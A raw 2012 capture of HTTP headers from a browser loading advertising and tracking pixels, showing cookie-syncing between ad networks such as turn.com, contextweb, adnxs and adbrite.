Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: i=49f60e71-671f-4f51-bac3-546f5c07b50d
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:43 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: i=49f60e71-671f-4f51-bac3-546f5c07b50d; expires=Tue, 18-Nov-2014 01:30:43 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
GET /AdJugTracking/Tracker.aspx?EXCOOKIE_RTB/CacheBuster=111299241&AdJugAgencyId=5626&AdJugCurrencyId=1&ExternalUserGUID=3788424827722360895 HTTP/1.1

Host: tracking.adjug.com
GET /AdJugTracking/Tracker.aspx?EXCOOKIE_RTB/CacheBuster=111299241&amp;AdJugAgencyId=5626&amp;AdJugCurrencyId=1&amp;ExternalUserGUID=3788424827722360895 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:28:12 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=&quot;http://tracking.adjug.com/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR LAW CUR ADM TAI PSA PSD IVA IVD HIS OUR SAM OTR LEG UNI COM NAV DEM CNT LOC&quot;
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache, no-cache
Set-Cookie: AJEAUDs=5626=3788424827722360895; domain=adjug.com; expires=Sat, 18-Nov-2017 01:28:12 GMT; path=/ AJUserGUID=cb7ad6fb-cbef-4d52-8eb6-03607d7cd660; domain=adjug.com; expires=Sat, 18-Nov-2017 01:28:12 GMT; path=/
Cache-Control: no-cache
Expires: -1
Content-Length: 43
GET /templates/yoo_bigeasy/images/module_icons_white.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.fenwaywest.com/templates/yoo_bigeasy/css/modules.css
Cookie: __qca=P0-1017690683-1353202236609; cto_rtt=; UnicaNIODID=LHSBVeW0yKx-XzFAqs9; __utma=54302783.284014554.1353202243.1353202243.1353202243.1; __utmb=54302783.1.9.1353202243; __utmc=54302783; __utmz=54302783.1353202243.1.1.utmcsr=shinynylonarts.com|utmccn=(referral)|utmcmd=referral|utmcct=/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:43 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:20:02 GMT
Etag: &quot;eccb30-2d2-4c38759d56080&quot;
Accept-Ranges: bytes
Content-Length: 722
Keep-Alive: timeout=5, max=493
Connection: Keep-Alive
GET /match?publisher_dsp_id=4&external_user_id=3788424827722360895 HTTP/1.1

Host: ad.360yield.com
GET /match?publisher_dsp_id=4&amp;external_user_id=3788424827722360895 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: tuuid=5913710b-d826-4b7c-96b6-9295f2788b78; um=!42,CiFwYWVicWNXYTlLZzR1a3N6QjZoRE1qUGtURVNTNUw3UTA#,1413416862
HTTP/1.1 200 OK

Content-Type: image/gif
Set-Cookie: tuuid=5913710b-d826-4b7c-96b6-9295f2788b78; path=/; expires=Sun, 18-Nov-2012 01:30:44 GMT; domain=ad.360yield.com
tuuid=5913710b-d826-4b7c-96b6-9295f2788b78; path=/; expires=Tue, 18-Nov-2014 01:30:43 GMT
um=!4,ChMzNzg4NDI0ODI3NzIyMzYwODk1,1416274243!42,CiFwYWVicWNXYTlLZzR1a3N6QjZoRE1qUGtURVNTNUw3UTA#,1413416862; path=/; expires=Tue, 18-Nov-2014 01:30:43 GMT
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 43
Date: Sun, 18 Nov 2012 01:30:43 GMT
GET /adserver/vdi/742697?d=3788424827722360895 HTTP/1.1

Host: ads.adbrite.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Encoding: gzip
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 18 Nov 2012 01:30:43 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref=&quot;http://files.adbrite.com/w3c/p3p.xml&quot;,CP=&quot;NOI PSA PSD OUR IND UNI NAV DEM STA OTC&quot;
Server: XPEHb/1.2
Set-Cookie: Apache=&quot;168362192x0.896+1353202243x-1487953027&quot;; path=/; domain=.adbrite.com; expires=Sat, 13-Nov-2032 01:30:43 GMT rb2=CiQKBjc0MjY5Nxi41pPQxAEiEzM3ODg0MjQ4Mjc3MjIzNjA4OTUQAQ; path=/; domain=.adbrite.com; expires=Sat, 16-Feb-2013 01:30:43 GMT
Content-Length: 59
GET /merge?pid=1&3pid=3788424827722360895 HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=1&amp;3pid=3788424827722360895 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:43 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJyrVjJUslIyNrewMDEysTAyNzcyMjYzsLA0VaoFAFClBds%3D; expires=Mon, 18-Nov-2013 01:30:43 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Mon, 19 Nov 2012 01:30:43 GMT
Connection: close
GET /adserver/vdi/1113874?d=3788424827722360895 HTTP/1.1

Host: ads.adbrite.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Encoding: gzip
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 18 Nov 2012 01:30:43 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref=&quot;http://files.adbrite.com/w3c/p3p.xml&quot;,CP=&quot;NOI PSA PSD OUR IND UNI NAV DEM STA OTC&quot;
Server: XPEHb/1.2
Set-Cookie: Apache=&quot;168362019x0.898+1353202243x-926203114&quot;; path=/; domain=.adbrite.com; expires=Sat, 13-Nov-2032 01:30:43 GMT rb2=CiUKBzExMTM4NzQYutaT0MQBIhMzNzg4NDI0ODI3NzIyMzYwODk1EAE; path=/; domain=.adbrite.com; expires=Sat, 16-Feb-2013 01:30:43 GMT
Content-Length: 59
GET /fr/u.php?p=328546547221502&m=3788424827722360895&t=2592000 HTTP/1.1

Host: www.facebook.com
GET /fr/u.php?p=328546547221502&amp;m=3788424827722360895&amp;t=2592000 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: public, max-age=0
Date: Sat, 17 Nov 2012 17:30:43 PST
Expires: Sat, 17 Nov 2012 17:30:43 PST
Pragma: public
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Encoding: gzip
X-FB-Debug: mUJsPbLZ+aXJTaxrMTb4F5fOJXxAlp/zlteC6uOf1Co=
Transfer-Encoding: chunked
Connection: keep-alive
GET /ad?mode=7&publisher_dsp_id=2&external_user_id=3788424827722360895 HTTP/1.1

Host: ad.afy11.net
GET /ad?mode=7&amp;publisher_dsp_id=2&amp;external_user_id=3788424827722360895 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.0 200 OK

Content-Type: image/gif
Connection: close
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate, proxy-revalidate
Expires: Sat, 1 Jan 2000 01:01:00 GMT
Last-Modified: Sat, 1 Jan 2000 01:01:00 GMT
Pragma: no-cache
Server: AdifyServer
Content-Length: 45
Set-Cookie: a=W7zVM-9XWEOlhZhgNAolYw; path=/; expires=Tue, 18-Nov-2014 01:30:43 GMT; domain=afy11.net; s=1,2*50a83a43*Kt4Gnhnob2*yPl4LpWp9pH1IGEwE8lfc2DcsA==*; path=/; expires=Tue, 18-Nov-2014 01:30:43 GMT; domain=afy11.net;
P3P: policyref=&quot;http://ad.afy11.net/privacy.xml&quot;, CP=&quot; NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC&quot;
GET /partner?adv_id=6481&img=1&uid=3788424827722360895 HTTP/1.1

Host: sync.search.spotxchange.com
GET /partner?adv_id=6481&amp;img=1&amp;uid=3788424827722360895 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 302 Found

Content-Type: text/html
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Location: partner.html
Date: Sun, 18 Nov 2012 01:30:44 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 18 Nov 2012 01:30:44 GMT
Location: http://cdn.spotxchange.com/media/thumbs/pixel/pixel.gif
P3P: CP=&quot;NOI DSP COR PSAo PSDo OUR IND UNI COM NAV ADMa&quot;
Pragma: no-cache
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: partner-0=eNptzM0KgkAUQOF1vUswOsMUQgtjTK50vfiTje5SKGbMbBGI8%2FRJtGx7OHxS7LxVcJBiU0Q5hCdoIhXU5ejo%2BXZkI04mmWqdsHaoZs0r1%2Bjk1sRHVhew7dw4kQFDHCWWoYShEl38mGudv1pfGPL7paOP7sxRAUvV1%2FT%2BmddL9nN6CRY5qTtDmwm0HUcLLrWhoPK8PGy%2F%2FgBydjlw; expires=Mon, 18-Mar-2013 01:30:44 GMT; path=/; domain=.spotxchange.com
TCN: choice
Vary: negotiate
Transfer-Encoding: chunked
Connection: keep-alive
GET /media/thumbs/pixel/pixel.gif HTTP/1.1

Host: cdn.spotxchange.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: partner-0=eNptzM0KgkAUQOF1vUswOsMUQgtjTK50vfiTje5SKGbMbBGI8%2FRJtGx7OHxS7LxVcJBiU0Q5hCdoIhXU5ejo%2BXZkI04mmWqdsHaoZs0r1%2Bjk1sRHVhew7dw4kQFDHCWWoYShEl38mGudv1pfGPL7paOP7sxRAUvV1%2FT%2BmddL9nN6CRY5qTtDmwm0HUcLLrWhoPK8PGy%2F%2FgBydjlw
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache
Last-Modified: Thu, 26 May 2011 15:59:36 UTC
Content-Length: 43
Cache-Control: max-age=63801
Date: Sun, 18 Nov 2012 01:30:44 GMT
Connection: keep-alive
GET /rum?cm_dsp_id=4&external_user_id=3788424827722360895 HTTP/1.1

Host: r.casalemedia.com
GET /rum?cm_dsp_id=4&amp;external_user_id=3788424827722360895 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI&quot;
Expires: Sun, 18 Nov 2012 01:30:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 18 Nov 2012 01:30:44 GMT
Content-Length: 43
Connection: keep-alive
Set-Cookie: CMID=8w-K.kPS1I0AACE6pJ4AAABp;domain=casalemedia.com;path=/;expires=Mon, 18 Nov 2013 01:30:43 GMT CMPS=134;domain=casalemedia.com;path=/;expires=Sat, 16 Feb 2013 01:30:43 GMT CMPP=008;domain=casalemedia.com;path=/;expires=Sat, 16 Feb 2013 01:30:43 GMT CMRUM2=04000000003788424827722360895;domain=casalemedia.com;path=/;expires=Mon, 18 Nov 2013 01:30:43 GMT CMST=UKg6Q1CoOkMA;domain=casalemedia.com;path=/;expires=Mon, 19 Nov 2012 01:30:43 GMT CMSC=UKg6Qw**;domain=casalemedia.com;path=/; CMDD=;domain=casalemedia.com;path=/;expires=Mon, 19 Nov 2012 01:30:43 GMT
GET /ping_match.gif?rurl=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D535039%26ev%3D_wfivefivec_ HTTP/1.1

Host: i.w55c.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Sun, 18 Nov 2012 01:30:44 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=125566b7-7167-49cb-824d-ca43d86c9ec7;Path=/;Domain=.w55c.net;Expires=Tue, 18-Nov-14 01:30:44 GMT
X-Version: DataXu Pixel Tracker v3.3 20120918
Cache-Control: private
P3P: policyref=&quot;https://cts.w55c.net/ct/p3p_policy_ref.xml&quot;, CP=&quot;UNI PUR COM INT STA OTC STP OUR CUR TAIo COR DSP NOI&quot;
Content-Length: 0
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=535039&amp;ev=125566b7-7167-49cb-824d-ca43d86c9ec7
Via: 1.1 fra061005 (MII-APC/2.2)
Keep-Alive: timeout=2
Connection: Keep-Alive
GET /TagPublish/GetAd.aspx?tagver=1&cp=520266&ct=66901&cn=1&crtg=&cwod=&epid=&esid=&ifurl=&tppg=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fwww.shinynylonarts.com%2F&cwr=&mrnd=94848874&if=1&tl=-1&pxy=&cxy=&dxy=&tz=-60&ln=en-US HTTP/1.1

Host: tag.contextweb.com
GET /TagPublish/GetAd.aspx?tagver=1&amp;cp=520266&amp;ct=66901&amp;cn=1&amp;crtg=&amp;cwod=&amp;epid=&amp;esid=&amp;ifurl=&amp;tppg=&amp;cf=300X250&amp;rq=1&amp;dw=300&amp;cwu=http%3A%2F%2Fwww.shinynylonarts.com%2F&amp;cwr=&amp;mrnd=94848874&amp;if=1&amp;tl=-1&amp;pxy=&amp;cxy=&amp;dxy=&amp;tz=-60&amp;ln=en-US HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=1; wf=0; pb_rtb_ev=2-535461..0.0.1353202242915|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292..0.0.1353202242915|543604..0.0.1353202242915|535039..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915
HTTP/1.1 200 OK

Content-Type: application/x-javascript;charset=utf-8
Server: GlassFish v3
P3P: policyref=&quot;/TagPublish/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;, policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 8/300
CW-Server: LGA-APP204 LGA-APP405 LGA-APP301
Content-Encoding: gzip
Date: Sun, 18 Nov 2012 01:30:44 GMT
Content-Length: 1131
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: 66901_300X250__POSUNKNOWNXUNKNOWN=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ vf=2; Domain=.contextweb.com; Expires=Sun, 18-Nov-2012 05:00:00 GMT; Path=/
GET /bh/rtset?do=add&pid=535039&ev=125566b7-7167-49cb-824d-ca43d86c9ec7 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=535039&amp;ev=125566b7-7167-49cb-824d-ca43d86c9ec7 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=2; wf=0; pb_rtb_ev=2-530731..0.0.1353202242915|535461.3788424827722360895.0.0.1353202243723|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|537085..0.0.1353202242915|541254..0.0.1353202242915|536088..0.0.1353202242915|543921..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292..0.0.1353202242915|535039..0.0.1353202242915|543604..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-79-59-195
Date: Sun, 18 Nov 2012 01:30:43 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:44 GMT; Path=/ pb_rtb_ev=2-535461.3788424827722360895.0.0.1353202243723|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292..0.0.1353202242915|543604..0.0.1353202242915|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:44 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /getuid?http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D545979%26ev%3D%24UID HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmKI[iYaGso%EUxav^(Q-FbEN!/vP[bh#s4^=K; sess=1; icu=ChII64YEEAoYASABKAEww_SghQUQw_SghQUYAA..; acb101605=![nC'XI()vE0+e54(v&gt;WMqfR+?enc=09LS0tLS4j8AAAAAAADgPwAAAAAAAOA_oehwY2kW4z-uEcE4uHTmP9RPlHBhqX1RoArzhH1cTlFDOqhQAAAAAKyWCAACAgAANQEAAAIAAABb7zEA51gBAAAAAQBVU0QAVVNEAKAAWAIvmQAADEoBAgUCAQUAAIIAJCI4EgAAAAA.&amp;tt_code=653070&amp;cnd=%21FCe48wiKeRDb3scBGAAg57EFMAA4r7IGQABItQJQrK0iWABg2AZoAHACeKIQgAG-CogB6AKQAQGYAQGgAQGoAQOwAQC5Aa8j6pa3dOY_wQGvI-qWt3TmP8kBlC84yfTw7T_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+3338%2C+1353202243%29%3Buf%28%27r%27%2C+3272539%2C+1353202243%29%3Bppv%282932%2C+%275872035725126684628%27%2C+1353202243%2C+1354411843%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21cgWdLAiKeRDb3scBGOexBSAA&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sat, 16-Feb-2013 01:30:44 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Mon, 19-Nov-2012 01:30:44 GMT; domain=.adnxs.com; HttpOnly
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=545979&amp;ev=5858721859426781856
Date: Sun, 18 Nov 2012 01:30:44 GMT
Content-Length: 0
GET /sync?type=gif&key=turn&uid=3788424827722360895 HTTP/1.1

Host: sync.adap.tv
GET /sync?type=gif&amp;key=turn&amp;uid=3788424827722360895 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Server: adaptv/1.0
Connection: Keep-Alive
